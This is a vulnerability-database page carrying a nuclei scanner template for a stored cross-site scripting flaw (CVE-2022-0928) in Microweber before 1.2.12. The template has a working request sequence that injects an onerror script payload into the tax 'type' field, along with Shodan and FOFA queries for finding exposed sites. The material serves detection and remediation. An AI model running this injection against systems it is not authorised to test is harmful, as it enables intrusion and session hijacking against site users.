Lucene search
K

Microweber < 1.2.12 - Stored Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Microweber < 1.2.12 Stored XSS, Impact, Remediatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Cross-site Scripting (XSS) - Stored
9 Mar 202217:44
huntr
ATTACKERKB
CVE-2022-0928
11 Mar 202211:15
attackerkb
Circl
CVE-2022-0928
11 Mar 202214:14
circl
CNNVD
Microweber 跨站脚本漏洞
11 Mar 202200:00
cnnvd
CNVD
Microweber Cross-Site Scripting Vulnerability (CNVD-2022-21818)
15 Mar 202200:00
cnvd
CVE
CVE-2022-0928
11 Mar 202210:25
cve
Cvelist
CVE-2022-0928 Cross-site Scripting (XSS) - Stored in microweber/microweber
11 Mar 202210:25
cvelist
EUVD
EUVD-2022-1457
3 Oct 202520:07
euvd
Github Security Blog
Cross-site Scripting in microweber
12 Mar 202200:00
github
NVD
CVE-2022-0928
11 Mar 202211:15
nvd
Rows per page
id: CVE-2022-0928

info:
  name: Microweber < 1.2.12 - Stored Cross-Site Scripting
  author: amit-jd
  severity: medium
  description: |
    Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade Microweber to version 1.2.12 or later to mitigate this vulnerability.
  reference:
    - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd
    - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0928
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-0928
    cwe-id: CWE-79
    epss-score: 0.02389
    epss-percentile: 0.81924
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve2022,cve,authenticated,huntr,xss,microweber,cms,vuln

http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /api/shop/save_tax_item HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{BaseURL}}/admin/view:settings

        id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
      - |
        POST /module HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer:{{BaseURL}}/admin/view:settings

        class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
          - 'contains(header_3,"text/html")'
          - 'status_code_2 == 200 && status_code_3 == 200'
        condition: and
# digest: 4a0a004730450221008fa5b82cc88e91af1031a188939080e37e3dab4d2f2a933790563c90384d9b2e022013cf9073f8135970ec50a65fa6b80e215e863400e3f586c42443e90ddca3e3d3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 23.5
CVSS 3.15.4
CVSS 36.8
EPSS0.02389
33